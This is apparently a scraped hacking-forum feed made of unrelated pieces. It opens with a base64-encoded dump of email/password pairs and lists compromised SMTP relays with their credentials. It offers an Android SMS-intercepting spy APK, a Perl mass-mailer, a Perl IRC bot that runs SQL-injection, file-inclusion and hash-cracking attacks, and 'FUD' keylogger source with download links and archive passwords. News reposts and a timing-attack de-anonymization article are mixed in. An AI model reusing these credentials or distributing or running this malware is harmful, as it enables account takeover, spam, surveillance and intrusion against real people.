Y29tOmd1cnNlbDEyDQpnYWxhLWFyc2xhbkBob3RtYWlsLmRlOmd1cnNlbA0KZnVya2FudHV0b3Jp YWxzQHlhaG9vLmNvbTpndXJzZWwNCmFuZHJlYXMta3JhcHBAdC1vbmxpbmUuZGU6YmltYm8sZmlw cw0KdGVuZHJlc3NlOTI6dm9pdHVyZQ0KbnppYm9zc0BsaXZlLmZyOnZvaXR1cmUyMjIzDQpmYWJp Y2hpbGxlci1ydXNzaWFAaG90bWFpbC5kZTowNTEyMTI2NjE4N21hcm1lbGFkZW5icm90DQpzdGV2 ZW4tYWhsZW5Ad2ViLmRlOnN0ZXZlbmJ2Yg0Kc3RldmVuLWFobGVuQHdlYi5kZTpzdGV2ZW5idmIN CmNocmlzdGluZWhvZWhsZUBhbGljZS5kZTpjaDcwaGwNCnN0ZXJuY2hlbjIyMDlAbGl2ZS5kZTpj aDcwaGwNCnRyYWV1bXdlaXRlcjE3QHlhaG9vLmRlOmNoNzBobA0KamFuaW5lLmhvZWhsZUB5YWhv by5kZTpjaDcwaGwNCmZ3YWNoaUB3ZWIuZGU6MTJ3YWNoZTEyDQpCZWFyY2hlbjA1QGxpdmUuZGU6 Y2hyaXN0aW5lNzANCmNocmlzdGluZWhvZWhsZUBhbGljZS5kZTpjaDcwNjZobA0KamFuaW5lLmhv ZWhsZUB5YWhvby5kZTpjaDcwNjZobA0KaGFuc3BldGVyZ3JvQHlhaG9vLmRlOmNoNzBobA0KZmxv dW5kamFuaW54M0B5YWhvby5kZTpjaDcwaGwNCm1pY2hhZWxhc2NobWlkdDkyQHlhaG9vLmRlOmNo NzBobA0KZnJlZXdheWNvbGE2NUB5YWhvby5kZTpjaDcwaGwNCmZyZWV3YXljb2xhNjVAeWFob28u ZGU6Y2g3MGhsDQpzdGVybmNoZW4yMjA5QGxpdmUuZGU6YmpoMDYwMg0KamFuaW5lLmhvZWhsZUB5 YWhvby5kZTppY2hiaW5kYXMNCk9wdGlvbmFsOmNoNzBobA0KY2V6YTY2QGhvdG1haWwuZGU6Zm9y dGlzMTk4NzY2DQpib3pva2t1cnQ2Njpmb3J0aXMxOTg3NjYNCmJvem9ra3VydC02NkBob3RtYWls LmNvbToxOTcxMTk5NjE5ODc2Ng0KcmVzYXRfY2FuQGhvdG1pbC5kZTpib3prdXJ0NjYNCnJlc2F0 X2NhbkBob3RtYWlsLmRlOmJvemt1cnQ2Ng0KY2V6YTY2QGhvdG1haWwuZGU6MTk3MTE5NjYxOTg3 NjYNCnRvYmlhczEuMTBAaG90bWFpbC5kZTp0b2JpYXMxMjM0DQphbmRyZWFoYW5mdEB5YWhvby5k ZTpBMTIxMjE5NzkNCm1hbmR5aGFuZnRAeWFob28uZGU6YW5nZS4wNmxpbmENCmFsaWkyMDAyQGhv dG1haWwuZGU6YWxpQ09PTDEyMw0Kd3d3LnBvbGdoaWdub0Bob3RtYWlsLml0Om1hcmluYQ0KaXZh bmdhc3Bhcm90dG9AbGliZXJvLml0OmNyaWJiaW8NCml2YW5nYXNwYXJvdHRvQGxpYmVyby5pdDpj cmliYmlvDQppdmFuZ2FzcGFyb3R0b0BsaWJlcm8uaXQ6Y3JpYmJpbw0KeWFubmlja19yb29zQGhv dG1haWwuY29tOm1hbWlmaWNrbWljaDEyMw0KeWFubmlja19yb29zQGhvdG1haWwuY29tOm1hbWlm aWNrbWljaDEyMw0KeWFubmlja19yb29zQGhvdG1haWwuY29tOm1hbWlmaWNrbWljaDEyMw0KeWFu bmlja19yb29zQGhvdG1haWwuY29tOnBhcGkxMjMNCnlhbm5pY2tfcm9vc0Bob3RtYWlsLmNvbTpw YXBpMTIzDQp5YW5uaWNrOnJvb3NAaG90bWFpbC5jb21cMDpwYXBpMTIzDQpMdWthcy5NMThAZ214 LmRlOmxtMzExMjk2DQpsdWthcy5tMThAZ214LmRlOmxtMzExMjk2DQpBc3Nhc3NpbmUzMDNAZ21h aWwuY29tOmxtMzExMjk2DQptZW1vX2NyYXp5XzQ1QGhvdG1haWwuY29tOm1laG1ldDExNzAuDQpq YXZpZXJfZ20xMkBob3RtYWlsLmNvbTpKQVZJRVJYSVRPDQpqYXZpZXJfZ20xMkBob3RtYWlsLmNv bTpKQVZJRVJYSVRPDQp0aGlzbWFzdGVyQGdteC5jaDp0aGlzMTIzDQpzZXJ2ZXRzZWxpbjIwMDNA aG90bWFpbC5jb206c2VydmV0c2VsaW4yNzAzMjAwM20NCmNlbGluYSBlbmVzOjY5MTk4MzgzDQpj ZWxpbmEgZW5lczo2OTE5ODM4Mw0KbWFya2FudGUudHZAZ21haWwuY29tOnByb2dyYW1hDQprb3Jh eV8yMDAwQGhvdG1haWwuY2g6a29yYXlob3Bhbm9nbHUxMjM3ODkNCmtvcmF5XzIwMDBAaG90bWFp bC5jaDprb3JheWhvcGFub2dsdTEyMzc4OQ0Ka29yYXlfMjAwMEBob3RtYWlsLmNoOmtvcmF5aG9w YW5vZ2x1MTIzNzg5DQprb3JheV8yMDAwQGhvdG1haWwuY2g6a29yYXlob3Bhbm9nbHUxMjM3ODkN CnNpbW9uc3RpZWdlbGVAd2ViLmRlXDA6c3VwZXJmaXNjaA0KaGF5cml5ZTY4QGhvdG1haWwuY29t LnRyOjE5NjhoYXkNCkVyYXlkaW5ob18xb0BsaXZlLmNvbVwwOldvbGZ0ZWFtMQ0KRXJheWRpbmhv XzFvQGxpdmUuY29tXDA6V29sZnRlYW0xDQphaW1hbm5ham1pMTk5MkB5YWhvby5jb206QWltYW5u YWptaQ0KcmF5X2thaXNlckByb2NrZXRtYWlsLmNvbTpBaW1hbm5ham1pDQpoc3lhaHJpem1pZUBn bWFpbC5jb20gOmd5bGFrZ3lsYWsNCmFpbWFubmFqbWkxOTkyQHlhaG9vbC5jb206YWltYW5uYWpt aQ0KT3B0aW9uYWw6YWltYW5uYWptaQ0KYWloYW5lYXJ0aG9yYkB5YWhvby5jb206cGFzczEyMzQN CkFpbWFuIE5ham1pIDpwYXNzMTIzNA0KYWltYW5uYWptaTE5OTJAeWFob28uY29tOkFpbWFubmFq bWkNCmFpbWFubmFqbWkxOTkyQFlhaG9vLmNvbTphaW1hbm5ham1pDQpQcm9rYWlzZXJAcm9ja2V0 bWFpbC5jb206YWltYW5uYWptaQ0KZ2lub25pa29sYWlAd2ViLmRlOkZlcnJ5NTYzOA0KZWR1YXJk b3NoaWdha2kxOUBnbWFpbC5jb206bWluaWhhY2tlcmVkdWFyZG9zaGlnYWtpMTIzDQo5NzgzOTc5 ODgzOmxhcmE2Nw0KcGF0cmlja2JpYW5jaGk5QGdtYWlsLmNvbTpCRjMzMTMzNA0KYWxleGlzbWFu aUBsaXZlLmZyOjIwMGJsYXN0ZXINCnZpY3Rvcm9rakBnbWFpbC5jb206dm9rajEzMTINCmJyZW5k YW5vdmFlczMxQGdtYWlsLmNvbTo5NTA4MzA2Ng0KYnJlbmRhbm92YWVzMzFAZ21haWwuY29tOjk1 MDgzMDY2DQpicmVuZGEubm92YWVzLjUwM0BmYWNlYm9vay5jb206OTUwODMwNjYNCnNlcmVuYS0x MEBob3RtYWlsLmRlOjEyMzQ1am91am91DQpqam9tbWVyZUBob3RtYWlsLmNvbTp3QUxMSVNCRVJn MTA3MTk5NA0KampvbW1lcmVAaG90bWFpbC5jb206d0FMTElTQkVSZzEwNzE5OTQNCmFybmR0dzk4 QGdvb2dsZW1haWwuY29tOm1nbjEyMw0KYXJuZHR3OThAZ29vZ2xlbWFpbC5jb206bWduMTIzDQph d2hpdGVnYW1pbmdAZ21haWwuY29tOm1nbjEyMw0KYXJuZHR3OThAZ29vZ2xlbWFpbC5jb206bWdu MTIzDQphcm5kdHc5OEBnb29nbGVtYWlsLmNvbTptZ24xMjMNCnJhbGZpcmFkQHdlYi5kZTowNDIx NjM2DQprcmltbzE5OTRAbGl2ZS5kZTpsb2w3ODk0NTYxMjNsb2wNCmFub255bTE5OTRzZ0BsaXZl LmRlOjc4OTQ1NjEyM2sNCmVuemlvMjAwMUBvdXRsb29rLmNvbTplbnppbzIwMDENCkFuamEyOTA6 YW5qYWFuamENCmFuamFoZXJpem9sdWNAZ21haWwuY29tOmF6ZXJ0eWF6ZXJ0eWF6ZXJ0eWF6ZXJ0 eQ0KYnByZW0xQHNtcy5hdDpiYXJiYXJhMQ0KaGViYm9ldUB5YWhvby5jb206MTIzNDU2Nzg5MTBk b21pbmlrc2FmYQ0KbWF0dGhpYXMtYmlzaW5nZW5AZ214LmRlOnN0aWNreQ0KbWF0dGhpYXMtYmlz aW5nZW5AZ214LmRlOnN0aWNreQ0KbmF0YWxpZWFsZXhjaW5keWtldmluQHQtb25saW5lLmRlOmNp bmR5Y2luZHkNCm1hdHRoaWFzLWJpc2luZ2VuQGdteC5kZTpzdGlja3kNCm5hdGFsaWVhbGV4Y2lu ZHlrZXZpbkB0LW9ubGluZS5kZTpjaW5keWNpbmR5DQp4MWtldmluM3hAd2ViLmRlOmtldmluMjIN Cngxa2V2aW4zeEB3ZWIuZGU6a2V2aW4yMg0KbWF0dGhpYXMtYmlzaW5nZW5AZ214LmRlXDA6c3Rp Y2t5DQptYXR0aGlhcy1iaXNpbmdlbkBnbXguZGVcMDpzdGlja3kNCm5pY29ibHVtZW5hdUBnb29n bGVtYWlsLmNvbVwwOk1jWFAxMG5ldQ0Kam9uYWhoZW1hbm5Ad2ViLmRlOmhlcm81NjU2DQpqb25h aGhlbWFubkB3ZWIuZGU6aGVybzU2NTYNCnJpbm5lbWFhcGVydHRpQGdtYWlsLmNvbTp0ZXJtb3Nw dWxsbw0KcG9pdHR1ZW1pbEBnbWFpbC5jb206cmlubmVtYWExMjMg
-
README FILE: CHATROOM Server Daemon AND CLIENT - AES 128 bit Encryption Support Programming Languages: C and Java Description: This is a chat system composed of a TCP/IP server daemon and its corresponding java client. You can chat with other peers in clear text or AES password based encryption on your own computer network. The AES password encryption and decryption is based on 128 bit key which is padded using SHA-256 applied to the provided password. REQUIREMENT: JDK at least version 8 GCC (GNU C Compiler with standard libraries) Make utility (For Compilation of both java and c program) Operating System of Server: Unix / Linux Operating System of client-user: ANY OS that has at least JRE or JDK 8 You can send a chat invitation to anyone by e-mail and attaching the generated .jar java executable (See next instructions). Your client will need at least java version 8. INSTALL: To install javac,java and jar on Unix / Linux: Download jdk, extract jdk and issue the following commands as root: ln -s /path/to/jdk/bin/java /usr/bin/java ln -s /path/to/jdk/bin/jar /usr/bin/jar ln -s /path/to/jdk/bin/javac /usr/bin/javac Install gcc using your package manager. Compile and run Server and Client: make ./chatd java -jar chatclient.jar Download Source
-
95.110.143.100:25 | test : 1q2w3e | SSL: False | Hostname: host100-143-110-95.serverdedicati.aruba.it | Inbox: True | Blacklist: Listed | Time: 30.09.2014 - 18:01:42 95.110.195.82:25 | support@scuolaitalia.net : 1q2w3e4r | SSL: False | Hostname: host82-195-110-95.serverdedicati.aruba.it | Inbox: True | Blacklist: Listed | Time: 30.09.2014 - 20:02:32 95.237.182.54:25 | info : 123456 | SSL: False | Hostname: host54-182-dynamic.237-95-r.retail.telecomitalia.it | Inbox: True | Blacklist: Listed | Time: 01.10.2014 - 17:16:07 95.110.194.208:465 | admin@educazionedigitale.it : 123456 | SSL: True | Hostname: host208-194-110-95.serverdedicati.aruba.it | Inbox: True | Blacklist: Listed | Time: 01.10.2014 - 17:49:07 88.149.203.246:465 | no auth | SSL: True | Hostname: 88-149-203-246.v4.ngi.it | Inbox: True | Blacklist: Listed | Time: 23.09.2014 - 19:41:30 202.174.80.177:465 | test@ozzieweb.net : 123456 | SSL: True | Hostname: vps-1265243.pem.bottle.com.au | Inbox: True | Blacklist: Listed | Time: 24.09.2014 - 18:00:47 142.213.19.212:25 | no auth | SSL: False | Hostname: mx2.prdev.ramq.gouv.qc.ca | Inbox: True | Blacklist: Listed | Time: 24.09.2014 - 20:48:41 62.174.82.15:25 | info@dermalogica.es : 1q2w3e4r | SSL: False | Hostname: 62.174.82.15.static.user.ono.com | Inbox: True | Blacklist: Listed | Time: 25.09.2014 - 00:14:51 85.94.211.58:25 | webmaster@avisprovincialelecco.it : 12345 | SSL: False | Hostname: vserv.fasthink.com | Inbox: True | Blacklist: Listed | Time: 25.09.2014 - 14:16:49 88.149.150.225:587 | test : test | SSL: True | Hostname: 88-149-150-225.v4.ngi.it | Inbox: True | Blacklist: Listed | Time: 26.09.2014 - 04:27:38 205.204.76.213:465 | test@deshbandhu.co.in : 123456 | SSL: True | Hostname: lserver099.megavelocity.net | Inbox: True | Blacklist: Listed | Time: 26.09.2014 - 12:28:44 93.150.30.202:465 | info@nexon.com : 1234567 | SSL: True | Hostname: net-93-150-30-202.cust.vodafonedsl.it | Inbox: True | Blacklist: Listed | Time: 26.09.2014 - 14:43:33 93.150.62.177:465 | guest@twilightrussia.ru : guest | SSL: True | Hostname: net-93-150-62-177.cust.vodafonedsl.it | Inbox: True | Blacklist: Listed | Time: 26.09.2014 - 22:13:05 5.56.61.227:465 | test@luxeibizaescorts.com : zxcvbnm | SSL: True | Hostname: mail.luxeibizaescorts.com | Inbox: True | Blacklist: Listed | Time: 26.09.2014 - 23:48:45 95.110.194.220:587 | info@vonescher.com : info | SSL: True | Hostname: smtp.pushit.it | Inbox: True | Blacklist: Listed | Time: 27.09.2014 - 06:10:38 121.212.246.62:25 | office : welcome | SSL: False | Hostname: CPE-121-212-246-62.static.nsw.bigpond.net.au | Inbox: True | Blacklist: Listed | Time: 27.09.2014 - 08:12:39 173.206.103.108:587 | no auth | SSL: True | Hostname: dsl-173-206-103-108.tor.primus.ca | Inbox: True | Blacklist: Listed | Time: 28.09.2014 - 15:15:09 95.110.224.71:465 | no auth | SSL: True | Hostname: host71-224-110-95.serverdedicati.aruba.it | Inbox: True | Blacklist: Listed | Time: 29.09.2014 - 06:58:16 95.110.204.51:25 | test@adrianorusso.it : test | SSL: False | Hostname: host51-204-110-95.serverdedicati.aruba.it | Inbox: True | Blacklist: Listed | Time: 29.09.2014 - 20:17:55 210.54.239.138:25 | test@youtube.com : password | SSL: False | Hostname: 210-54-239-138.adsl.xtra.co.nz | Inbox: True | Blacklist: Listed | Time: 20.09.2014 - 20:33:18 203.59.102.239:587 | no auth | SSL: True | Hostname: iin-lnk.ne1.au.calorieking.net | Inbox: True | Blacklist: Unknown | Time: 22.09.2014 - 01:18:20 67.231.21.182:465 | test@canadabeefmarketinglibrary.ca : 123456 | SSL: True | Hostname: ded.CanadaBeefMarketingLibrary.ca | Inbox: True | Blacklist: Listed | Time: 22.09.2014 - 07:08:41 210.54.239.34:587 | office : admin | SSL: True | Hostname: www.supplyzone.co.nz | Inbox: True | Blacklist: Listed | Time: 22.09.2014 - 07:56:27 83.61.12.26:25 | no auth | SSL: False | Hostname: 26.Red-83-61-12.staticIP.rima-tde.net | Inbox: False | Blacklist: Not Listed | Time: 22.09.2014 - 09:25:11 124.168.225.248:25 | admin : admin | SSL: False | Hostname: 124-168-225-248.dyn.iinet.net.au | Inbox: True | Blacklist: Listed | Time: 18.09.2014 - 18:40:25 139.130.17.78:25 | no auth | SSL: False | Hostname: pri1316890.lnk.telstra.net | Inbox: False | Blacklist: Not Listed | Time: 18.09.2014 - 19:38:33 144.136.152.53:25 | no auth | SSL: False | Hostname: CPE-144-136-152-53.fnzl1.cha.bigpond.net.au | Inbox: False | Blacklist: Listed | Time: 18.09.2014 - 22:02:46 144.140.59.229:25 | no auth | SSL: False | Hostname: lxtimweb04.tim.telstra.com | Inbox: False | Blacklist: Not Listed | Time: 18.09.2014 - 22:15:45 144.140.59.230:25 | no auth | SSL: False | Hostname: lxtimweb05.tim.telstra.com | Inbox: False | Blacklist: Not Listed | Time: 18.09.2014 - 22:15:45 144.140.75.198:25 | no auth | SSL: False | Hostname: lxtimweb06.tim.telstra.com | Inbox: False | Blacklist: Not Listed | Time: 18.09.2014 - 22:17:37 144.140.75.196:25 | no auth | SSL: False | Hostname: smtp.nlis.mla.com.au | Inbox: False | Blacklist: Not Listed | Time: 18.09.2014 - 22:17:39 150.101.115.173:465 | no auth | SSL: True | Hostname: ppp115-173.static.internode.on.net | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 00:00:22 120.151.223.158:465 | root : trustno1 | SSL: True | Hostname: struct31.lnk.telstra.net | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 01:02:35 165.228.175.173:587 | no auth | SSL: True | Hostname: lakeka.lnk.telstra.net | Inbox: True | Blacklist: Listed | Time: 19.09.2014 - 05:10:27 165.228.189.217:587 | no auth | SSL: True | Hostname: mail.colemanprint.com.au | Inbox: False | Blacklist: Listed | Time: 19.09.2014 - 05:11:49 165.228.226.204:25 | no auth | SSL: False | Hostname: gillig.lnk.telstra.net | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 05:16:57 165.228.232.135:25 | no auth | SSL: False | Hostname: norman6.lnk.telstra.net | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 05:16:57 180.148.67.130:25 | no auth | SSL: False | Hostname: 180.148.67.130.static.amnet.net.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 09:40:28 180.148.77.105:25 | no auth | SSL: False | Hostname: 180.148.77.105.static.amnet.net.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 09:45:28 202.3.108.82:25 | no auth | SSL: False | Hostname: bri31m.saxtelmedia.com.au | Inbox: True | Blacklist: Listed | Time: 19.09.2014 - 11:58:31 202.7.89.185:25 | no auth | SSL: False | Hostname: b14B9.static.pacific.net.au | Inbox: False | Blacklist: Listed | Time: 19.09.2014 - 12:11:36 202.44.163.225:25 | no auth | SSL: False | Hostname: 202.44.163.225.static.nexnet.net.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 12:53:26 202.72.142.169:25 | no auth | SSL: False | Hostname: dsl-202-72-142-169.wa.westnet.com.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 13:36:03 202.90.34.177:25 | no auth | SSL: False | Hostname: erp.redmap.com | Inbox: False | Blacklist: Listed | Time: 19.09.2014 - 14:00:44 202.137.205.48:25 | no auth | SSL: False | Hostname: imobxmr1.imowa.com.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 14:47:23 202.138.61.92:25 | no auth | SSL: False | Hostname: 92.61-138-202.static.corp.pth.iprimus.net.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 14:55:23 202.171.160.166:25 | no auth | SSL: False | Hostname: 202-171-160-166.cw.cpe.bigair.net.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 15:32:29 202.174.232.166:587 | admin@nbcsports.com : admin | SSL: True | Hostname: 202-174-232-166.ip.hyperlink.net.au | Inbox: False | Blacklist: Listed | Time: 19.09.2014 - 15:48:09 203.5.1.43:25 | no auth | SSL: False | Hostname: 203-5-1-43.xacom.com.au | Inbox: False | Blacklist: Not Listed | Time: 19.09.2014 - 17:15:01 202.173.147.164:25 | admin@fnn-news.com : password | SSL: False | Hostname: dsl-202-173-147-164.qld.westnet.com.au | Inbox: True | Blacklist: Listed | Time: 19.09.2014 - 18:03:59
-
Features: Grabing all information about the victim (Phone Number, ICCID, IMEI, IMSI, Model, OS) Interception of incoming SMS messages and sending them to the web-panel and the control room. Call forwarding to any number Grabing all incoming and outgoing SMS Grabing all incoming and outgoing calls Record audio, sending it to the server (know what is happening around) Sending SMS to any room without the owner's knowledge The apk work but the panel seems to have some problems. Bots are not showed. The infected phone connect right to the panel, i know it because there are two folder created named with the imei number of the infected phone (in /sound and /listing) but nothing inside these folders and nothing inside the database... Maybe that someone here make it working. Let me know if you need help for decompil the apk changing the host, etc... then recompil it. Note: At the first line of each php files of the admin panel change '<?' to '<?php' otherwise it will not work. (on many hosting, xampp included) If someone make the panel working, contact me, i will post the panel in the thread. Some screeshots: Download: https://www.sendspace.com/file/eex06p pass: opensc.ws Source: opensc
-
Summary: With 99.8 percent accuracy, the system will be available to both individual customers and retailers by 2015. The Chinese Academy of Science (CAS) will launch a face recognition payment app next year, which is slated to land with near-perfect accuracy. As reported by Science and Technology Daily on Sunday, the Chongqing-based research institute said it has set up the world's biggest Asian face database with more than 50 million records. The database was created with help from with the University of Illinois, and the National University of Singapore. According to Zhou Xi, director of the CAS Chongqing Green Technology Research Institute, researchers have developed a unique data collecting technology, which could simultaneously gather facial information from 91 different angles. Researchers were also able enhance the system's learning abilities to function stably and accurately in a dynamic environment. Zhou said that the system scored the highest accuracy, 99.8 percent, according to a Carnegie Mellon international standard, exceeding its predecessors' best record of 97.6 percent. The facial recognition system has already been utilized at border controls and attendance machines. Once the users install the according app on their mobile devices and link it with bank accounts or credit cards, it will take "one second" for the system to identify the payer, Zhou said. As for security concerns, Zhou said the special algorithm will be highly reliable, and can easily detect whether the scanned faces are real ones, instead of a held-up photo or video. The system, which is equipped with online learning abilities, will automatically study the changing characteristics of the subject, thus preventing weight changes from affecting the results, for example. Apart from developing the app for individual customers for online shopping, the institute will also be working with brick-and-mortar retailers and setting up face recognition devices for payment at checkout counters, allowing customers to complete purchases without reaching to their pockets. Via China develops facial recognition payment system with near-perfect accuracy | ZDNet
-
Bitcoin’s momentum among key merchants and platforms on the web keeps accelerating. After hinting at it a few weeks ago when Braintree enabled Bitcoin-based transactions for PayPal developers, the company is now enabling Bitcoin across the PayPal network for merchants of digital goods. The company has expressed interest in bitcoin for a while, with eBay CEO John Donahoe saying in the past that it would play an “important role” in the company’s future. Now that large players from Overstock to Wikipedia are now relying on the cryptocurrency for a part of their transactions or donations, PayPal is stepping in. Through partnerships with BitPay, Coinbase and GoCoin, PayPal will let its merchants accept bitcoin for digital goods transactions. They decided to go with a handful of launch partners instead of a single one, as PayPal’s Braintree did with Coinbase earlier this month. To be clear, this isn’t about adding Bitcoin to PayPal’s digital wallet and it’s only in North America for the moment. These are baby steps for now. “This is a huge endorsement to the digital currency community,” said GoCoin CEO Steve Beauregard. PayPal will earn transaction revenue through referral fees, which are pretty common throughout the payments world. “PayPal is playing the role of the intermediary, but the cost will be left up to the merchant and the payment processor,” said Scott Ellison, who is PayPal’s senior director of competitive intelligence and corporate strategy. A few weeks ago at TechCrunch Disrupt, Braintree CEO Bill Ready said that it was adding Bitcoin as a payment to its SDK. Via PayPal Enables Bitcoin Transactions For Merchants Selling Digital Goods | TechCrunch
-
https://github.com/PHPMailer/PHPMailer sau #!/usr/bin/perluse Net::SMTP::TLS; # CONFIGURAÇÕES BÁSICAS # # Autenticação no servidor SMTP my $servidor=""; my $porta=""; my $user=''; my $pass=""; #Dados do sender #my $destino='email@servidor.com'; # caso não queira usar uma lista my $assunto=""; my $email=''; print <<print; ============================================================================================= .oooooo..o ooo ooooo ooooooooooooo ooooooooo. +-----------------------+ d8P' `Y8 `88. .888' 8' 888 `8 `888 `Y88. | By KoubackTr / 2014 | Y88bo. 888b d'888 888 888 .d88' | | `"Y8888o. 8 Y88. .P 888 888 888ooo88P' | koubacktr\@gmail.com | `"Y88b 8 `888' 888 888 888 +-----------------------+ oo .d8P 8 Y 888 888 888 8""88888P' o8o o888o o888o o888o ooo ooooo .o ooo ooooo .o o8o oooo `88. .888' .d88 `88. .888' .d88 `"' `888 888b d'888 .d'888 .oooo.o .oooo.o 888b d'888 .d'888 oooo 888 8 Y88. .P 888 .d' 888 d88( "8 d88( "8 8 Y88. .P 888 .d' 888 `888 888 8 `888' 888 88ooo888oo `"Y88b. `"Y88b. 8888888 8 `888' 888 88ooo888oo 888 888 8 Y 888 888 o. )88b o. )88b 8 Y 888 888 888 888 o8o o888o o888o 8""888P' 8""888P' o8o o888o o888o o888o o888o ============================================================================================= print # ARQUIVO COM OS ENDEREÇOS DE EMAIL # print "\t[!] Você precisa informar o arquivo de lista com os endereços\n Arquivo: "; $arquivo = <stdin>; open(EMAIL,"< $arquivo") or die "FILE NOT FOUND!\n"; chomp(my @destinatario); # DADOS A SEREM ENVIADOS # $smtp->data(); $smtp->datasend("To: $destino\n"); $smtp->datasend("From: Apelido\n"); $smtp->datasend("Content-Type: text/html \n"); $smtp->datasend("Subject: $assunto"); $smtp->datasend("\n"); $smtp->datasend(" <!-- CONTEUDO DA MENSAGEM --> <br> <center> <font size='8'> <b>TESTE DE EMAIL EM PERL</b> </font> </center> "); $smtp->datasend("\n"); print "\t\t\t\t[+] Enviado para: \t\t\t\ $destino\n"; $smtp->dataend(); } $smtp->quit; print "\t[!] Fim\n";
-
https://www.sendspace.com/file/ammx8x Enjoy!
-
ClapTrap is an IRC bot written in perl that performs various attacks against web applications. #!usr/bin/perl #ClapTrap IRC Bot 0.5 #(C) Doddy Hackman 2014 # #Commands to use : # #!sqli <page> #!lfi <page> #!panel <page> #!locateip <web> #!sqlifinder <page> #!rfifinder <page> #!crackit <hash> #!tinyurl <page> #!httpfinger <page> #!md5 <text> #!base64 <encode/decode> <string> #!hex <encode/decode> <string> #!ascii <encode/decode> <string> #!help # #Thanks to Aceitunas & Explorer (perlenespanol) Code: Download: #!usr/bin/perl#ClapTrap IRC Bot 0.5 #© Doddy Hackman 2014 # #Commands to use : # #!sqli <page> #!lfi <page> #!panel <page> #!locateip <web> #!sqlifinder <page> #!rfifinder <page> #!crackit <hash> #!tinyurl <page> #!httpfinger <page> #!md5 <text> #!base64 <encode/decode> <string> #!hex <encode/decode> <string> #!ascii <encode/decode> <string> #!help # #Thanks to Aceitunas & Explorer (perlenespanol) # use IO::Socket; use LWP::UserAgent; use HTML::LinkExtor; use URI::Split qw(uri_split); use Digest::MD5 qw(md5_hex); my @Links, values %b ); } } sub toma { return $nave->get( $_[0] )->content; } sub tomar { my ( $web, $var ) = @_; return $nave->post( $web, [ %{$var} ] )->content; } sub tomados { return $nave->get( $_[0] ); } sub tomax { return $nave->get( $_[0] ); } sub savefile { open( SAVE, ">>" . $_[0] ); print SAVE $_[1] . "\n"; close SAVE; } sub abrir { open my $FILE, q[<], "config.txt"; my $word = join q[], <$FILE>; close $FILE; return $word; } sub head { print qq( @@@@ @ @ @@@@@ @@@@@ @@@@@ @ @@@@@ @ @@@@@ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @@@@@ @ @ @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@ ); } sub copyright { print "\n\n-- == © Doddy Hackman 2014 == --\n\n"; } # The End ? Source Files from Doddy Hackman ? Packet Storm
-
@ZeroDoi PM me, vreau sa vad mireasa pt fiul meu, dau o bere
-
De-Anonymize Google Users with new Timing Attack is possible, it is also possible identify Tor users if they’re logged in to Google while using Tor browser. De-anonymize Google users is the goal of different studies and a new research conducted by Andew Cantino, the vice president of engineering at Mavenlink, demonstrates that it is possible to demasking Google users with a Timing Attack under particular conditions. In the past Cantino had been awarded a bug bounty from Google three times. Google has confirmed the attack scenario, but told to Andrew Cantino it would not address the issue because the risk of exposure is ranked as low. De-anonymize Google users is the goal of different studies and a new research conducted by Andew Cantino, the vice president of engineering at Mavenlink, demonstrates that it is possible to demasking Google users with a Timing Attack under particular conditions. In the past Cantino had been awarded a bug bounty from Google three times. Google has confirmed the attack scenario, but told to Andrew Cantino it would not address the issue because the risk of exposure is ranked as low. Cantino provided the details of the attack in a blogpost, an attacker can target a user or an organization share a Google document with one or more email addresses, but taking care to uncheck the option whereby Google sends the recipient a notification. Using the technique explained by Cantino, a threat actor could track victims when they logged into a shared address visits the attacker’s site, the experts remarked that the techniques could be adopted in spear phishing attack or to de-anonymize Tor users if they’re logged in to Google while using the Tor browser. The attacker can set up a malicious page that repeatedly instantiates an image whose source points at the URL of a Google Drive document. The time necessary to load the page will be greater if the document is not viewable. The onerror callback of the image is triggered in both cases, viewable or not viewable, because the result isn’t an image, but the attacker can record the time from the image instantiation to triggering of the onerror. Cantino revealed that during its tests the loading process took an average of 891ms when the document was available, meanwhile the loading time was 573ms when it was not. Of course, the time depends on the speed of the connection used, for this reason it makes sense to simultaneously test against a document that is always known to be inaccessible, then compare times with the probe document. A bad actor could use the attack to try to identify a user who’s on Tor if it is logged into his Google account, or anyway to allow the attacker to target the attack on specific users view malicious content. “What this sort of timing attack can allow is de-anonymizing of specifically targeted Google users as they browse the web. If you control a website and want to know when a specific user with a specific Gmail address visits your site, you could use this technique to identify them, even without setting a cookie,” “Imagine you want to build a page that behaves differently when a certain Google user views it, either because you’re conducting a spear phishing attack to gain their trust, or simply because you want to conclusively log that they visited your site. You could silently share a document with this user, then determine when they visit a website you control.”Cantino said. Via De-Anonymize Google Users with new Timing Attack | Security Affairs
-
https://www.sendspace.com/file/tplj5c
-
[C++] Fud Keylogger Source Code Dir list: 08/09/2014 15:34 <DIR> . 08/09/2014 15:34 <DIR> .. 04/03/2014 16:54 9,407 Logger.cpp 03/03/2014 10:30 653 Logger.h 20/02/2014 14:23 156 LogType.h 04/03/2014 15:43 1,895 mpkhook.cpp 23/02/2014 14:31 4,413 mpkhook.vcxproj 23/02/2014 14:31 1,455 mpkhook.vcxproj.filters 20/02/2014 13:18 143 mpkhook.vcxproj.user 23/02/2014 12:22 197 save.txt 04/03/2014 16:45 1,428 SaveToFile.cpp 03/03/2014 10:44 349 SaveToFile.h 11 File(s) 20,096 bytes 2 Dir(s) 18,466,537,472 bytes free password arhive: MPLogger67584 Download: http://uppit.com/ogtrkmleh1np/MPLogger.rar source: opensc
-
